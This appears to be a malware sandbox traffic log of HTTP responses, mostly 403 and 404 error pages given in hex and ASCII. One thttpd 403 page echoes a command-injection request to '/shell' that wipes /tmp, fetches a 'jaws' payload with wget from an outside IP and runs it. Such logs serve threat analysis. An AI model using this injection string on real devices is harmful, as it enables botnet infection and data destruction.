Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:08:53 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:08:59 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:08:53 GMTServer: ApacheContent-Length: 203Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETsvr: 05Date: Mon, 01 Nov 2021 09:08:53 GMTContent-Length: 1245Set-Cookie: CacheWeb=2270734528.20480.0000; path=/Vary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48CONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1566Date: Mon, 01 Nov 2021 09:08:56 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:08:56 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 01 Nov 2021 09:09:02 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48CONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 01 Nov 2021 09:08:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 166Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: thttpd/2.25b 29dec2003Content-Type: text/html; charset=UTF-8Date: Sat, 17 Oct 2015 00:24:01 GMTLast-Modified: Sat, 17 Oct 2015 00:24:01 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-cache,no-storeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 32 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 27 2f 73 68 65 6c 6c 3f 63 64 2b 2f 74 6d 70 3b 72 6d 2b 2d 72 66 2b 2a 3b 77 67 65 74 2b 34 39 2e 31 32 2e 32 33 33 2e 35 32 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 27 20 72 65 73 6f 6c 76 65 73 20 74 6f 20 61 20 66 69 6c 65 20 70 6c 75 73 20 43 47 49 2d 73 74 79 6c 65 20 70 61 74 68 69 6e 66 6f 2c 20 62 75 74 20 74 68 65 20 66 69 6c 65 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 43 47 49 20 66 69 6c 65 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 74 68 74 74 70 64 2f 22 3e 74 68 74 74 70 64 2f 32 2e 32 35 62 20 32 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>403 Forbidden</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H2>403 Forbidden</H2>The requested URL '/shell?cd+/tmp;rm+-rf+*;wget+49.12.233.52/jaws;sh+/tmp/jaws' resolves to a file plus CGI-style pathinfo, but the file is not a valid CGI file.<HR><ADDRESS><A HREF="http://www.acme.com/software/thttpd/">thttpd/2.25b 29dec2003</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Nov 2021 09:09:00 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveContent-Length: 109Date: Mon, 25 Oct 2021 11:08:54 GMTExpires: 0Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error 404: Not Found</title></head><body><h1>Error 404: Not Found</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 09:09:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Nov 2021 16:15:57 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
